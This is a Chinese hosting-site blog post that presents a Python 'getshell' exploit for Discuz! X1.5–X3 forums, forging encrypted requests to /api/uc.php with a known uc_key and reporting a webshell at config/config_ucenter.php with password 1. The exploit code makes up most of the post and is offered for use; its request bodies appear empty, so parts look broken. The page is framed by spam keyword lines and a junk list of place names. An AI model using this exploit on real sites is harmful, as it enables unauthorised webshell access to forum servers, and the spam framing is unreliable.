欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到云服務器

網絡技術

Discuz X1.5 X2.5 X3 uc_key getshell exp

2016-05-25 夢飛 170

uc_key是UC客戶端與服務端通信的通信密鑰。因此使用uc_key來fetshell只能獲取UCenter Client的webshell,即Discuiz!論壇的webshell。如果一個服務器上只有UCenter Server是不能通過uc_key來獲取該服務器上的webshell的(不過可以通過uc_key來將服務器上的數據并重置用戶口令,后面講)。

90分享的php版的exp代碼,但uc_key和url是嵌入在代碼中的,因此導致使用不方便。所以我將代碼改成python版的,以后使用就方便了。

使用方法:
Discuz X1.5 X2.5 X3 uc_key getshell exp
 

import hashlib  

import time  

import math  

import base64  

import urllib  

import urllib2  

import sys  

def microtime(get_as_float = False) :  

    if get_as_float:  

        return time.time()  

    else:  

        return '%.8f %d' % math.modf(time.time())  

 def get_authcode(string, key = ''):  

    ckey_length = 4 

    key = hashlib.md5(key).hexdigest()  

    keya = hashlib.md5(key[0:16]).hexdigest()  

    keyb = hashlib.md5(key[16:32]).hexdigest()  

    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]  

    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()  

    key_length = len(cryptkey)  

    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string  

    string_length = len(string)  

    result = '' 

    box = range(0, 256)  

    rndkey = dict()  

    for i in range(0,256):  

        rndkey[i] = ord(cryptkey[i % key_length])  

    j=0 

    for i in range(0,256):  

        j = (j + box[i] + rndkey[i]) % 256 

        tmp = box[i]  

        box[i] = box[j]  

        box[j] = tmp  

    a=0 

    j=0 

    for i in range(0,string_length):  

        a = (a + 1) % 256 

        j = (j + box[a]) % 256 

        tmp = box[a]  

        box[a] = box[j]  

        box[j] = tmp  

        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))  

    return keyc + base64.b64encode(result).replace('=', '')  

 def get_shell(url,key,host):  

    '' 

    headers={'Accept-Language':'zh-cn',  

    'Content-Type':'application/x-www-form-urlencoded',  

    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',  

    'Referer':url  

    }  

    tm = time.time()+10*3600 

    tm="time=%d&action=updateapps" %tm  

    code = urllib.quote(get_authcode(tm,key))  

    url=url+"?code="+code  

    data1='' 

    try:  

        req=urllib2.Request(url,data=data1,headers=headers)  

        ret=urllib2.urlopen(req)  

    except:  

        return "訪問出錯" 

    data2='' 

    try:  

        req=urllib2.Request(url,data=data2,headers=headers)  

        ret=urllib2.urlopen(req)  

    except:  

        return "error" 

    return "webshell:"+host+"/config/config_ucenter.php,password:1" 

if __name__ == '__main__':  

    host=sys.argv[1]  

    key=sys.argv[2]  

    url=host+"/api/uc.php" 

    print get_shell(url,key,host)

  1. 上篇:Linux系統Nmap命令的使用
  2. 下篇:某PHP webshell后門分析
騰訊云代理

Copyright © 2003-2021 MFISP.COM. 國外vps服務器租用 夢飛云服務器租用 版權所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 固镇县| 滕州市| 外汇| 呼和浩特市| 监利县| 达拉特旗| 二手房| 闻喜县| 汶上县| 句容市| 连云港市| 米泉市| 玉林市| 阳谷县| 呼和浩特市| 吉隆县| 博罗县| 遂川县| 额尔古纳市| 宜君县| 永宁县| 仙桃市| 满洲里市| 遂川县| 龙南县| 安龙县| 怀来县| 报价| 吐鲁番市| 宁国市| 洪雅县| 岗巴县| 理塘县| 东城区| 沁水县| 车致| 萨嘎县| 罗定市| 河池市| 舞阳县| 萍乡市|